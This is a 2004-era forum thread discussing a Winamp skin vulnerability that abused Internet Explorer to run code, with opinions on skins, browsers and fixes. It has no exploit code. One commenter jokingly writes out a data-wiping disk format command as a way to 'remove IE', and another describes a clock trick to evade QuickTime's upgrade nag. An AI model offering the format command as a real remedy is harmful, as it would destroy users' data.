And those numbers do make sense - winamp probably uses its own libraries for mpeg decoding and so on, whereas I'm sure wmp uses directx stuff.

fix?

So what's the fix?
(Beside removing winamp)

All Versions?

[(54)T-Dub]

I know that a lot of us "old school" winamp users still use the classic winamp lite v2.81 [plug] I much lighter version of the software[/plug]. The article states that it affects:

• WinAMP 3.x
• Winamp 5.x

Re:All Versions?

[jdrake]

yup, 3.x+ is just broken, I love my 2.xx I'll never change!

thank you, that is all.

Re:All Versions?

[Jacer]

I assume you meant 2.91. It was the last stable, bloat free release. Plus it supports album list, instead of that god awful media library trash that comes with the new stuffs. Yeah, I rant, but it's ok.

Re:All Versions?

[CritterNYC]

yup, 3.x+ is just broken, I love my 2.xx I'll never change!

Yeah, 3.x was a mess... but 5.x is based on the 2.x version with the modern skin support added in. On my (albeit fast) PC it routinely sits in the background playing MP3s consuming a bit over 5mb or RAM and using 0% CPU.

The Media Library is decent, like iTunes but without genre browsing, and far more customizable. And it isn't a complete piece of shite like iTunes for Windows is.

Re:All Versions?

weee....2.93 isn't affected.

i hate skins

[avandesande]

am i the only person that finds ever changing interfaces an annoyance??

Re:i hate skins

[t_allardyce]

no you're not.

Re:i hate skins

Skins aren't for interfaces, rather they are eye candy for the desktop. The keyboard is all the interface I need.

Re:i hate skins

[Rosco+P.+Coltrane]

am i the only person that finds ever changing interfaces an annoyance??

Apparently not.

Re:i hate skins

am i the only person that finds ever changing interfaces an annoyance??

I'm guessing you're still using the default desktop wallpaper?

Re:i hate skins

[avandesande]

yeah and classic interface
no transitions
etc etc

Re:i hate skins

you are not alone

Re:i hate skins

[88NoSoup4U88]

It's not about everchanging ; it's about customizing to your own use.

Re:i hate skins

[gwernol]

am i the only person that finds ever changing interfaces an annoyance??

Ever changing interfaces would indeed be an annoyance, but the point of skins is to let you find the UI you like and stick with it. For any individual user the UI is the same (unless you really want to keep changing it) its just that different users can have different UIs.

Its a bit like the "bloat" in large applications like Word. Of course most users only use 10-20% of Word's features, but each person can use a subtly different 10-20%. You choose to learn the subset of features that are useful to you and ignore the rest. Those others are only a minor distraction.

Re:i hate skins

[topher1kenobe]

I love skins. I pick one and use it for years before switching. Skins allow people to pick an interface they like, something that fits into their desktop style, and leave it there.

I don't go with random skins, or frequently changing skins. I just browse the library, pick a good one, and stick with it.

Re:i hate skins

[blixel]

am i the only person that finds ever changing interfaces an annoyance??

Why does it have to be ever changing? Find the look you like and stick with it. If that happens to be the default, great.

Re:i hate skins

[avandesande]

whatever just put regular buttons on the goddam thing. maybe i should phrased it 'i dont need distracting visual garbage on my computer'

Re:i hate skins

[Frnknstn]

Are you a troll or just an idiot? A background isn't an interface. Interfaces are functional, backgrounds are decorative.

Re:i hate skins

[asdfghjklqwertyuiop]

Skins allow people to pick an interface they like, something that fits into their desktop style, and leave it there.

Pick an interface they like? Hah. I wish I could pick the skin I like: None at all. Something that makes the application's interface look and work exactly like every other application I run instead of some incomprehsible and unusable artistic garbage.

Re:i hate skins

[wan-fu]

Why is the parent modded insightful? "None at all" isn't really a choice. A program has to look like something, skinned or not. And it's a matter of every user for the application to look "exactly like every other application" that he might be running. The default Winamp skin sure as hell doesn't look anything like any version of Windows. Perhaps you could use some of that "unusable artistic garbage" to make it look and work like all the other programs you run.

Re:i hate skins

[It'sYerMam]

What if people want a bit of art to go with their tunes? Art and sound go hand in hand, which, I suppose is one of the themes behind the iPod.
I personally think that media apps deserve to look as good as their physical counterparts. You can get some nice skins for GTK, QT, and the rest, but they DO need to be functional and easy to use. The Media player is going to be as easy to use with or without its skin, it's not like the buttons disappear.

Re:i hate skins

[default+luser]

Yeah, I have been using the same skin since 2000...MetAmpMorphosis by Zombie. Even works with XMMS, hurray for standards!

Anyway, a hack like this wouldn't work with older v2 skins because they're just image maps.

Re:i hate skins

[asdfghjklqwertyuiop]

"None at all" isn't really a choice. A program has to look like something, skinned or not.

Sure it is. None at all means just display the application's widgets the standard way for that platform. Don't apply any skin. Just let the GUI toolkit draw the widgets the way it wants to (ie, according to my global preferences). Don't try to do something fancy and different. Or at least give me the option of making your application act standard.

And it's a matter of every user for the application to look "exactly like every other application" that he might be running.

And that's why we have OS-wide (or at least GUI toolkit-wide) themes for the interface. These are vastly superior to per-application skins for tons of reasons, including the following:

Perhaps you could use some of that "unusable artistic garbage" to make it look and work like all the other programs you run.

Actually I can't. I can't make a winamp skin that will be drawn bigger or smaller depending on wether I'm looking at my 128dpi laptop lcd panel or much lower dpi CRT display (a la Mozilla or Qt or windows).

And furthermore, is everyone supposed to create a theme for every application they use that makes it behave according to their preferences? I don't have time for that. I'll just use something that doesn't use skins (if I can find it. For whatever reason the authors of practiacly every multimedia oriented app find it neccessary to do skins).

And I'm supposed to adjust the themes in every single application every time I change some settings in the rest of my system?

Re:i hate skins

I like to make my winamp skin, desktop theme, and wallpaper all match.

Re:i hate skins

[asdfghjklqwertyuiop]

What if people want a bit of art to go with their tunes?

That's fine. The question here is what if people don't? What if they just want their tunes and not the funky GUI? If the application's weren't skinned at all, you'd always have OS themes that you could use to spurce up your system.

I personally think that media apps deserve to look as good as their physical counterparts.

The problem is that the apps are in a totally different medium than their physical counterparts. Some things that may work well on a physical audio device are completely stupid on a software program. For example, the Sonique media player for windows uses a radial volume control (a dial) - just like you'd find on a physical radio. However there's a reason you almost never see dials like this on software interfaces: because they really suck on computer screens. You have to manage mouse movement in two dimensions while using the widget and it just feels awkward and much harder to use than a slider. They authors of the program captured the appearance of the physical device, but the actual experience of using it is totally different and vastly inferior.

You can get some nice skins for GTK, QT, and the rest, but they DO need to be functional and easy to use.

Agreed, and for the most part they are.

The Media player is going to be as easy to use with or without its skin, it's not like the buttons disappear.

Funny you should mention disappearing buttons. One particular skinned app that I hated using came with a skin that had a few buttons designed such that I didn't even realize they were buttons. The skin was so poorly designed that the effectively made the buttons disappear to the inexperienced user.

Re:i hate skins

You assume there is a good skin out there somewhere. I've yet to find one for any app I use. This is a pretty good observation of the user experience provided by most "good" themes.

Re:i hate skins

[BillyBlaze]

If you want a good music player without skins, you should try FooBar2000.

Re:i hate skins

[EvilIdler]

The "none at all" option is Foobar 2000.
Lean player, does what it's told.

Re:i hate skins

[wan-fu]

While I think your argument has merit and I definitely agree with some of your points, I think it's a bit short-sighted. You bring it up yourself when you mention "OS-wide (or at least GUI toolkit-wide) themes" - this is why it's great to be able to skin things. On my computer, I use KDE but I also run a bunch of Gnome applications. It's great to able to run the GTK-QT theme against all my programs. Similarly, in Windows, if I were to run some GTK program it wouldn't look as great if I weren't provided the opportunity to at least change the skin of the program to a Windows look. You might argue that this isn't skinning but instead "theming" a GUI toolkit, but I would say that this is just an example of a skin applied to a bunch of programs.

Re:i hate skins

The point is that 'theming' as you say is the appropriate way to do this - 'skins' that affect one application only are emphatically NOT. They make my skin crawl. I'm using Winamp 2 on my windows box btw, and I just checked, it's NOT vulnerable to this exploit (and it would be very odd if it were, since there's no MSHTML crap allowed on my window box, it's kept completely uninfected by IE.) I searched and searched until I found a 'Windows' theme and that's what it's run for several years now. It's still annoying though, because of course it's only mimiccing the standard toolbox for the platform, not actually using it, and this shows sometimes.

Re:i hate skins

[It'sYerMam]

So get a better skin? See, there's the beauty of the system - you can download another one! There's no point in saying "In one skin there was nothing but blackness" because it was probably done by some l4m3r who thought d00d, i cNa m4k3 teh skinz0rs!!

On a related note, you can still get media players of your preferred kind - try rhythmbox. Even if you prefer XMMS, you can often find a skin that's close to your GTK/QT skin, or - design your own!

Re:i hate skins

[Bilange]

Interfaces are functional, backgrounds are decorative.

I have to disagree here (for the interface part)

Lets take Winamp example, while we're talking about it.

In the 1.x and 2.x days, it doesnt matter what skin you are using: all the functionality wont move by a pixel.

On the other hand, with today's Winamp 3.x and 5.x, the buttons, sliders, and whatever components are placed whereever the skin creator wants it to be located, and in my book I call that decorative in some way - having to search for the "load a file" button everytime I load a new skin is somewhat a pain. And having a skin that takes half of the screen isnt really "functionnal", but rather annoying.

My two (canadian) cents.

Re:i hate skins

[DNS-and-BIND]

I remember when Quicktime's interface came out, it looked all artsy and jazzy, only it violated every rule in the book about Apple interface design, and was widely trashed by the Mac faithful.

Re:i hate skins

[asdfghjklqwertyuiop]

So get a better skin? See, there's the beauty of the system - you can download another one!

Well the point is even if I found a nice looking skin, there are still things that skin doesn't do that a standard UI doesn't. It doesn't obey my global settings for things like display DPI and font sizes. I've never tried to design a skin before, but as far as I can tell they are all just a bunch of bitmaps. Themes are more advanced. They give you the prettiness of skins and the flexibility and functionality of a plain GUI.

Re:i hate skins

[Frnknstn]

You are broadly correct, but you missed the point.

The first post complained about the changing interfaces. Somebody repied in a post that basically equated interfaces, decorative or not, with backgrounds.

My post refuted that point. Interfaces may be decorative, but if they do not actual DO anything (are not functional), they are not interfaces. If backgrounds have interactive, functional elements, they are not backgrounds, but interfaces.

Redmond school of engineering

[Rosco+P.+Coltrane]

Program skins with "browser tags" and "embedded xml"? sheesh, what next, word processor documents that have executable code inside?

Re:Redmond school of engineering

[SCVirus]

Ever heard of Microsoft's Doc format?

Re:Redmond school of engineering

Have you heard of the word "dense"? That's what the guy was talking about...

Re:Redmond school of engineering

[cygnusx]

> Program skins with "browser tags" and "embedded xml"?

Believe it or not, Mozilla uses the same technique. Not all of us believe application design reached its pinnacle with ed, you know.

Does anyone still use winamp?

With all the malware packed into the current versions, I thought everyone had jumped ship or stopped upgraded at 1.x long ago.

2.91

The good old 2.91 is not affetced though AFAIK.

Fixes...

[xdeadbeef]

• Use Firefox as your default browser (which won't auto-launch skins), or...
• don't install modern skin support in winamp (or delete plugins\gen_ff.dll if you already are installed), or...
• get winamp 5.05 when it comes out in a day or two.

Re:Fixes...

[Thrymm]

Amen! I use it to play music, I dont look at the damn thing. I know some people love skins, for me I dont need it, just need to hear the music not see the colors!

Re:Fixes...

[Egekrusher2K]

According to the Winamp forums, the default Firefox configuration is just as susceptible to this exploit as IE is. You can change your settings in either browser so that it is not affected by your exploit.

Fortunately, I use Mozilla. :)

Re:Fixes...

[Chelloveck]

Amen! I use it to play music, I dont look at the damn thing. I know some people love skins, for me I dont need it, just need to hear the music not see the colors!

Right on, man! That's what the drugs are for...

Winamp Unlimited Has The Full Report

[lotsofno]

.

Winamp Unlimited has a friendly summary on how the worm infects the user, as well as steps one can take to avoid being infected.

This is also worth noting: "The Nullsoft team have already implemented a patch for this exploit, which will be included in a very-near future release5.04a or 5.05. This next version is already in its third beta stage, and will include several other unrelated changes/fixes."

Re:Winamp Unlimited Has The Full Report

[bot24]

Will this patch involve extracting the files onto a local webserver so that the extracted files will appear to be in the internet zone? How would Nullsoft patch a bug that is embedded in a Microsoft library? Deleting files with known extensions could break some skins because this might be exploitable through VBScript too.

Nyah Nyah, I'm immune...

[praedictus]

...Coz I use XMMS for my MP3 and FLAC goodness. Mind you it is supposed to be able to use WinAmp skins...

This is absolutely nothing to worry about...

[Rahga]

Since XP Service Pack 2 came out, it's not like any of those Windows machines can connect to the internet anyway....

Just use windows media player.

Windows Media Play works fine.

Seriously, Microsoft Office and Internet Explorer seem to work just fine for me.

Plus, they all work on my Mac :)

Re:Just use windows media player.

[name773]

isn't that blasphemy or something?

Re:Are you from a swing state?

Heres how it works, you vote for who I want and I vote for who you want

Aah, but I'll want some proof you voted for who I wanted. So, be sure to keep your proof receipt from the Diebold machine!

No wait...

Re:Are you from a swing state?

I sympathize with your cause, but I don't think my casting a vote for Kodos for you is really going to affect the election all that much, sorry.

Just another reason to use iTunes, I guess

[Robotech_Master]

I used to be a big fan of Winamp...but then I switched to iTunes and never looked back. Guess that's a good thing.

Re:Just another reason to use iTunes, I guess

I used to be a big fan of Winamp...but then I switched to iTunes and never looked back. Guess that's a good thing.

Good thing you never looked back. We're all pointing and laughing at you.

Re:Just another reason to use iTunes, I guess

[Jaysyn]

Geiss, Milkdrop, R4, KataFX, Smoke & ZMatrix.

6 good reasons to stay with WinAMP.

Jaysyn

Re:Just another reason to use iTunes, I guess

You are aware iTunes installs massive (many MB) services that start at bootup you have no need of don't you? You're aware it blindly installs the iPod service, whether you have an iPod or not right? If I remember the last time I looked at it ALSO installed Quicktime, which is one of the worst behaved Windows installs of a media utility in well, pretty much ever. And Quicktime btw, also installs services you have absolutely no need of.

Memory is cheap, but that doesn't mean I want Apple deciding it can just use mine for code that never executes (or even worse, executes when I don't need it).

Re:Just another reason to use iTunes, I guess

[LilMikey]

I call BS. Real easily has Apple beat in the "worst behaved Windows installs of a media utility in well, pretty much ever" category. But we'll give them a close second.

Re:Just another reason to use iTunes, I guess

[That's+Unpossible!]

Good thing you never looked back. We're all pointing and laughing at you.

Seriously man... posting this comment in a thread detailing an exploit in your elitist program is kinda... retarded.

WinAmp exploits: 2 (that I know of)
iTunes exploits: 0

Let's keep score.

Re:Just another reason to use iTunes, I guess

Yes, let us keep score.

Winamp gayness: 0
iTunes gayness: 1,000,000,000,OMG,LOL,000

Re:Just another reason to use iTunes, I guess

[Phroggy]

You are aware iTunes installs massive (many MB) services that start at bootup you have no need of don't you?

Some of these are required to make certain features work. If you don't want those features, fine - disable the services.

You're aware it blindly installs the iPod service, whether you have an iPod or not right?

Of course Apple does this to make it easier for iPod owners to use their iPods, and a lot of people are buying iPods. If you don't own one and don't plan to buy one (and don't have friends who own them), disable the service!

If I remember the last time I looked at it ALSO installed Quicktime, which is one of the worst behaved Windows installs of a media utility in well, pretty much ever.

There's a damn good reason why it installs QuickTime. QuickTime is a media layer. Guess what iTunes does? Plays media. Guess how? By using QuickTime. Think of iTunes as simply a shell on top of QuickTime.

Worst behaved in what way? The QuickTime Pro $30 upgrade nag screen? Yeah, that sucks ass. Tip: set your clock forward several years, launch QuickTime Player, click "Later", fix your clock. When you click "Later", it adds a registry entry with tomorrow's date, and won't bug you again until then.

Oh yeah, and I think it drops a "Get QuickTime Pro" movie on your desktop. At least it used to do that. Annoying, but I believe the above trick works with that too.

And Quicktime btw, also installs services you have absolutely no need of.

Click the systray icon, open QuickTime Preferences, choose Browser Plugin from the menu, uncheck the last box. Why it's listed under Browser Plugin, I don't know.

So, to sum up:
1) iTunes installs services needed for features you don't intend to use, such as iPod support and CD burning
2) QuickTime puts an icon in the systray, which is easy to disable
3) QuickTime drops a movie on your desktop and nags about paying $30 when you launch QuickTime Player, which sucks ass, but isn't an issue if all you're using is iTunes.

So yeah, those are some legitimate complaints. Did you have any others?

By the way, on Mac OS X, iTunes doesn't run those extra services (because they're handled by the OS itself), and doesn't install QuickTime (because it's already installed), and QuickTime doesn't put an icon in the systray (because that's... retarded).

Crazy

[ddod]

Just one more reason why I have ceased to used internet explorer for jsut about anything. Firefox all the way!!

It's no hoax. I normally don't go for these things but...Free ipods rock

Winamp 2.81 Rules!

They haven't added anything good to any new version of WinAmp since 2.81 - I used to run 2.81 on my P133 and it was great. Try running the new versions of winamp on a P133, and all of a sudden your computer isn't fast enough.

Skin(ny) dipping?

[davidsyes]

If WinAmp doesn't release or realize a worthy fix, they could be dipping their skin in an arcing, amping, electric fryer if the exploits get out of control.

(Hmm, fixes, amping, arcing...)

Re:Skin(ny) dipping?

[davidsyes]

COME now, chap...

Flamebait?

Sigh...

Skinning is Worth It

Having to periodically wipe your system and reinstall from backups is a small price to pay for the ability to have your apps look like real equipment.

I mean, WinAmp can actually look like different kinds of real CD players! Can you believe that? It can look like all sorts of things; it doesn't have to look like a rectangular window at all. That just rocks! You can even change the way it looks at runtime! You can download whole new looks! Man, that is too cool.

Kudos to those guys. This is the kind of thing that really makes computing fun.

Re:Skinning is Worth It

[maduro55]

"having to periodically wipe your system and reinstall... is a small price to pay..." Are you smoking crack? This is obviously a TROLL.

Re:Skinning is Worth It

[caino59]

most insightfully humorous comment of the day.

Re:Skinning is Worth It

[bbowman0]

it doesn't have to look like a rectangular window at all. That just rocks!

Big deal, K-Jofol had that nearly a decade ago.

Re:Skinning is Worth It

[talaphid]

I don't understand what's so hot about this whole 'sound synthesis' process you kids are talking about. Me, I put in my vinyl, and then output the pits and grooves as text on the screen with C/PMamp... 010100000101010111010101... oh, yes, that's the really soothing introduction to Beethoveen's 3rd.

Re:Skinning is Worth It

[LoadWB]

WinAmp can actually look like different kinds of real CD players!

I get a chuckle out of programs that are made to resemble real articles. Not that it is a bad thing, I just think sometimes we go over-board, like with games. I am waiting for the day a 3D game is advertised as "so real, it's like you got your lazy ass up off the couch and really played the actual game it simulates!"

Re:Skinning is Worth It

You mean like Dance Dance Revolution?

"So real you may actually get some exercise"

Re:Skinning is Worth It

[whyde]

Making software look like a real piece of hardware is only useful if you normally walk up to your CD player and press its buttons with the backside of your mouse.

They should stick with interfaces which are easy to manipulate with today's common computer input devices, instead of pretending you really had a touch-responsive dataglove on at all times.

"No matter how cool your interface is, less of it would be better." --Alan Cooper

Yes

Yes you are

Fixed in betas!

[oliverjms]

Check out www.winampunlimited.com for more details

Re:Fixed in betas!

oli, i am responding to your post because it looked lonely--all hanging around with no replies or points. nice link though.

Re:Fixed in betas!

[oliverjms]

I also believe mlipod.sf.net need a plug?

things to say

[XO]

Just to comment on all the first 11 posts I see here:

(1) I've not used WinAmp in many years [like i've not used Windows in many years], but when secunia says the advised course of action is "use another product", i'm guessing that that probably means this feature can not be disabled, or at least not easily? or if it can be, then it's disabling can also be circumvented?

(2) Absolutely right, having a component of the system that is active to ALL programs, wether it wants it or not, is inviting the most bizarre of security holes. Of course, the WinAmp people probably should come up with a better, more secure transport method for getting their skins around, but it's not really their fault that IE is a pile of crap security wise.

(3) what kinda genius would figure out that you could embed an xml file, with instructions to run a specific executeable file, within a zipped skin file, and then manage to trigger a security hole in a web-browser module that really shouldn't have a damn thing to do involved with the program that you're sending this virus through? The people who are BREAKING the security I figure have got to be infinitely more intelligent than the people who are CREATING the security.. or at least a whole hell of a lot more creative..

i really can't imagine that anyone could be thinking, when they write a program like this, "oh, what if someone tries to take advantage of such and such known security flaw in this way through our program, even though they don't have jack and shit to do with each other?" ..

obviously, you're going to try to cover in advance for security things, but who could predict in attack in such a convoluted fashion?

Re:things to say

[gershbaz]

The whole point of good/secure coding is not anticipating attacks, but just making sure that the program can't do anything *except* what it's supposed to. "Integration" unless its done with secure clear protocols is the source of nearly every security hole for windows.

Re:things to say

I've not used WinAmp in many years [like i've not used Windows in many years], but when secunia says the advised course of action is "use another product", i'm guessing that that probably means this feature can not be disabled, or at least not easily? or if it can be, then it's disabling can also be circumvented?

Secunia must've really been lazy at the time to have just suggested to "use another product." There have been several ways one can safeguard their system from this exploit that have been posted either in this discussion and on Winamp Unlimited.

Besides, if the alternative is iTunes, I'd much much rather take my chances with Wniamp.

Re:things to say

[maximilln]

or at least a whole hell of a lot more creative

That's precisely what this is. It's like checking for secret doors in a dungeon in an old RPG like Bard's Tale. One step forward, check right, check left. One step forward, check right, check left. Repeat until you find an opening.

This sort of thing could very easily affect Linux as well. As much as I love Linux I've been waiting for someone to spring something like this through Mozilla. It's only a matter of time before someone figures it out.

Re:things to say

[Ced_Ex]

Whole lot easier to break something than it is to create something.

Particularly when you have that something in front of you and you can analyze it to death. Which is why you don't see exploits of things yet to be created. :)

Re:things to say

[drinkypoo]

It is possible to easily fix this problem.

Assistance for the clueless

I'm an idiot--I don't get it. Can anybody help?

Re:Assistance for the clueless

[gwernol]

I'm an idiot--I don't get it. Can anybody help?

Flensing means to remove the skin from something.

Skinny Dipping

[t_allardyce]

Is there any way to actually uninstall IE or atleast make it absolutely not the default browser and ban its exicution or engine use by all other programs and perhaps replace that engine with something else? Considering that was part of a big law-suit surly theres a way? Infact i need IE installed for website testing so the second option would be best.. all i can think of is setting the permissions of the engine dll and IE exicutables but replacing it would be nice too..

Re:Skinny Dipping

[MrNemesis]

Yes.

http://http//www.crackbaby.com/article.php?sid=100 93

Not tried it myself yet, but it replaces all calls to IE with calls to the browser of your choice.

Re:Skinny Dipping

[MrNemesis]

Crapola, should have used the preview...

http://www.crackbaby.com/article.php?sid=10093

Re:Skinny Dipping

[t_allardyce]

Sweet, now all we need is a simple utility for rapid deployment..

Re:Skinny Dipping

[DarkMantle]

No... considering iexplore.exe and explorer.exe use the same .dll files to handle known extentions. If you open windows explorer, or My Computer, and type a web address in the address bar, you get the IE look and feel without a new window, or waiting for iexplore to load.

Essentialy the point I'm trying to make is the only way to remove Internet Explorer is to type

format c: /y/s/q

into dos and then install Linux, BSD, Darwin, or if you want to stay with windows, you could install windows 95 or older, but don't update IE to version 4.0 or higher.

Re:Skinny Dipping

link completely broken at this point. redirects to microsoft.com of all things.

Re:Skinny Dipping

[t_allardyce]

So what was the outcome of that law-suit that said Microsoft should make IE seperable from Windows?

Re:Skinny Dipping

[traveyes]

wierd... in firefox that link takes ya to microsoft.com....

here's the correct link.

.

Re:Skinny Dipping

No it doesn't. You must be using IE or something.

Re:Skinny Dipping

[DarkMantle]

The next version it's supposed to be implemented. For now the courts are happy that you can hide IE in favor of another browser.

Re:Skinny Dipping

This is not a very good method. It leaves the code on your system, and I wouldn't trust NT to really respect those permissions when stuff is hardwired to want to use it. Try LitePC instead and actually keep the shit off your system.

Re:Skinny Dipping

[DNS-and-BIND]

A new worm?

Same skin for...

[Moonlapse]

I've been using the same skin on Winamp 2.8 for years(plug for 'Silence' skin). Maybe that's because its part of my disk image I always wind up going back to.....

Expect these to grow more common...

[hanssprudel]

Now that people have started to use firewalls, and the risk of worms and rootkits that infect through open, exploitable, holes grows smaller, it is time to expect more and more exploits to follow alternative vectors.

Note how many buffer-overflow exploits there have been in server daemons. Well, there is no reason to believe that servers are any worse written with regards to input than client applications - quite the contrary actually.

People think they are safe with a firewall. But I'm willing to bet there are undiscovered exploits in just about every application they run. WinZip? WinAMP? Acrobat Reader? Media player? Anything that handles files received over the Internet is potentially a vector for viruses and possibly worms.

This time it was bad escaping, which made the exploit trivial, but there a buffer overflow would have served just as well. Neither firewalls nor anti-virus software will protect you.

Solution: use another product.

[farlcow]

Patient: "Doc, it hurts when I do this" Doctor: "Then don't do that"

Summary of article summary

[MobyDisk]

Yet another unwanted, unnecessary feature involving Internet Explorer embedded into a program that doesn't need it has a remote exploit. To mitigate this problem, disable active anything, automatic anything, and ActiveX anything. That is all.

Re:Summary of article summary

This feature is also available on FireFox.

Dumb Question

[ewhac]

For what possible purpose does a skin -- which is essentially nothing more than graphical elements -- need to invoke the browser?

WTF? Seriously, help me out here. I've only been a programmer for 25 years, so I may not understand the deeply compelling reasons driving such a design decision.

Schwab

Re:Dumb Question

[Pedrostolemaburrito]

I am supposing that envoking the browser is a side-effect of the mini-browser bundled with Winamp since 2.x and the skin applies to it also. If it isn't bad enough to have multiple browser windows open (for the sorry buggers not using tabbed browsing on decent browsers), we can also browse the internet right in Winamp...woohoo!

Re:Dumb Question

[argent]

A skin invokes the browser because Microsoft's got this tasty-looking rich-text, GUI, and graphics layout and rendering engine that they decided about seven years ago needed to be a core part of the OS. Which is all well and good, but it's not just a rich-text rendering engine, it's pretty much all of Internet Explorer but the window decorations and preferences utility.

They did this not because it's a good idea for every application to have internet access and rich scripting with only a token sandbox about the potentially untrusted data they're displaying, but because they wanted to keep the DoJ from forcing them to compete with other companies that were producing web browsers.

My response at the time was to ban the use of IE, Outlook, and any other application that I could think of or that I found out about that was using this component to view untrusted documents. Well, I didn't ban them directly, I talked our CEO into it. I figured that most IT administrators and managers would do the same, because this was obviously just asking for trouble (I didn't know what trouble it would cause, but I knew it was asking for it). Then, when Melissa hit a little while later, I figured THAT would finally be enough to get people to ban these "typhoid mary" applications. I mean, anyone could tell this was doomed.

Boy, was I naive. I forgot that people who haven't worked on computer security aren't nearly paranoid enough. I expect that on the 10th anniversary of the integration of IE with the desktop people will still believe Microsoft when they say they're serious about security this time.

And I never would have imagined that Apple would follow suit and use the same LaunchServices for local applications opening things like help files and for web browsers to run plugins, helper apps, and so on...

For the love of god, people, get on the horn to Microsoft, and Apple, and the folks at Mozilla.org who are still using these inherently broken APIs themselves (yes, Firefox has been demonstrated to respond to a couple of the same exploits). Tell them that ENOUGH is ENOUGH. You can't fix this with better heuristics, you can only fix it by making the sandbox unconditional... seperate the display code and the access code and give each application a choice of bindings (at the VERY least, 'this is the binding for trusted documents, this is the binding for untrusted documents, and this is the binding for you specifically').

Re:Dumb Question

I dont know why is this modded informative. Anything that basheds Microsoft becomes insightful I believe. The question was why is the skin launching the browser? And you respond saying how MS added the core of IE to OS? Insightful..eh?

Is the xml in the skin zip, being parsed by any of MS's code? (literally, tehy might be using MS API. But again i am digressing). Its entirely winamp's codebase that is actually parsing the xml and launching the browser on encountering the browser tag. come to think of it did you RTA?

Anyway I am not sure this post will be seen. I know the secret to get modded insightful..

Here it is:
M$ Windoze su**s

Re:Dumb Question

He answered the question and expounded on the topic. Just because it didn't fit your ideological zealotry doesn't make it a bad post.

Re:Dumb Question

oh yes..he answered the question but did the answer really make sense:

I ask my friend why did you crash the car?. My friend goes "well. i can accelerate fast and can turn my wheel to hit a car?". Well just caoz you can invoke a browser doesn't mean every damn app has to invoke it and blame it on MS embedding it in OS.

If you looked at the question in the parent post, of the post in concern he really mentioned it in a way what is the need to invoke a browser from a a skin.

just because someone expounds on a topic and playing blame game without substantial evidence, doesnt mean that the reply in the post is really an answer or is it?

Re:Dumb Question

[argent]

I wasn't "bashing Microsoft", mister "anonymous coward". I was pointing out a deep design flaw in a specific Microsoft product, and explaining why it was there. I pointed out that Apple, in Safari, and Firefox under both Mac OS and Windows, have the same problem... you gonna complain I should be modded up or down because I "bashed" some of the "good guys" as well?

Is the XML being parsed by MS' code? IT DOESN'T MATTER. Firefox is parsing its own HTML, but it's using the Microsoft-provided application bindings, bindings that are the result of applications registering as handlers for desktop objects (Hi! I'm the handler for Word documents! Hi! I'm the handler for HTML documents! Hi! When a user clicks on a screen saver icon, RUN ME!). These bindings are simply NOT APPROPRIATE for use by untrusted objects. Any object that would not be normally expected to have full local user rights .. documents downloaded from the net, remote web servers, data files like PDFs and skins .. should not be granted access to the same set of application bindings as local files.

When an application sees a tag, or a mime type, or anything else, that says "hi, I'm an HTML document", or "I'm a pointer to an HTML document", what does it do? Well, Microsoft's API says "pass this to what the user has selected as an HTML document handler (that is, their default browser).

Now, if their default browser is one of the browsers that's inherently sandboxed, then you've still got multiple layers of protection between you and the exploit. Mozilla won't give a file loaded from the local disk any more rights than a file loaded from hackers-r-us.com.

But if your default browser is Internet Explorer, you've just asked Internet Explorer to open a file from the local disk. And Internet Explorer sees that it's a local file, and does a quick costume change, and becomes Windows Explorer (because the only difference between the HTML control loaded from Internet Explorer and the HTML control opened from any other application is a thin shell that doesn't actually have any control over what the browser is actually doing), and Windows Explorer is the Superbrowser. When a document is being displayed by Windows Explorer, it can do anything that Windows Explorer can. Which is anything the user has the rights for.

This is a problem.

Over on the Pocket PC, Microsoft has a program called Pocket Internet Explorer. It's a much simpler program than IE, and I don't know if it has any code in common with IE, but it has a big advantage over IE. And that is, it's just another program. It can't turn into Superbrowser. So this transformation isn't something baked into the idea of a browser.

There's a LOT of good browsers you can run under Windows, and Windows is a pretty good desktop environment if you're careful to avoid the whole Internet Explorer / Outlook trap. Go ahead and use them.

BUT...

Again, as I said, get on the horn to people like Apple and the Mozilla organization, because they're being stupid too. Let them know you don't want this kind of design spreading. Let the folks at mozilla.org, even, know you *like* Windows, that you *want to use* Windows, but they can't assume that the Windows API for launching a helper application is something that should be trusted with random unknown content, any more than the API for installing a service or running a program is. It's not designed for that, it's continually patches by Microsoft to try and make it safe, but the fundamental nature of the beast is that it's not possible to use that kind of API in that way safely.

This is not "bashing Microsoft", or if it is it's bashing Apple, Mozilla.org, and probably KDE as well because Konqueror has some kind of desktop integration that may also end up with the same problem.

Re:Dumb Question

exactly. you are kind of making my point get across easier.

just like how you point out MS does not need to integrate every damn thing in to Expolrer, like opening a local file from network browser and vice versa, i dont see any reason why a skin's xml need to have an ability to mention to open a browser.

So instead of pointing fingers at MS alone on this, lets give some credit to winamp ppl for giving us the ability to open a broser from a skin

Re:Dumb Question

[argent]

dont see any reason why a skin's xml need to have an ability to mention to open a browser

They don't, if you do all the rendering and layout yourself. But IF you use Microsoft's rendering API to display rich content, which is one of those features of Windows that Microsoft is proud of, then it's pretty much impossible to keep it from opening a browser when there's a command to open a browser in that content.

I know, I worked on it, and got some of our top Windows geeks to work on it. If you use Microsoft's HTML control, you are using the browser. There's no way around it.

Re:Dumb Question

[argent]

I ask my friend why did you crash the car?. My friend goes... ... your friend goes "if I use the conrols that the manufacturer provided, then every now and then the accelerator just goes flat out and there's nothing I can do about it. The only way to keep it from happening is to open the hood and lean out the window and tug on that lever in the engine *there* to control the accelerator. Of you do that, then it's perfectly safe so long as you're good at steering with your feet."

And you go "Well, I guess that's the way you have to drive the car, then. Why don't you tie this rope to the accelerator control and tug on that to steer."

And your friend goes, "Yeh, now that I've crashed the car, I know better. But don't you think they should make controls that work?"

And you're going. "Yeh, but it's still partly your fault for trying to drive the car like the manufacturer suggests." And I'm going "what the hell are you smoking?"

Except that somehow (and this is something else I said, which you seem to have missed) people don't say "I know better", they say "Damn, I guess Microsoft really has to fix the controls this time, they've only been crashing cars for seven years."

Which is psycho.

Mac + Microsoft = Good for users and business

"We have to let go of a few things here. We have to let go of the notion that for Apple to win, Microsoft has to lose," Jobs told the crowd



But admitted cynical, long-time Mac fans said that the Microsoft investment in Apple has been a good thing for the company.



"And Microsoft products for the Mac can be better than software from other companies that run on the Mac, like Netscape Navigator -- I think Explorer is more stable on the Mac than Navigator,"


Microsoft makes good software for Apple computers, let's give credit where credit is due.

winamp skin

I use a winamp skin in xmms, I hope I'm not susceptible to this attack. Your thoughts?

Re:winamp skin

[Doug+Lim]

I'd bet it's probably not an issue for xmms using winamp skins. I don't believe it's a problem with winamp per se. I believe it's due to winamp's integration with IE.

It really annoying that IE integration can't be disabled or if it's even possible to integrate with another browser.

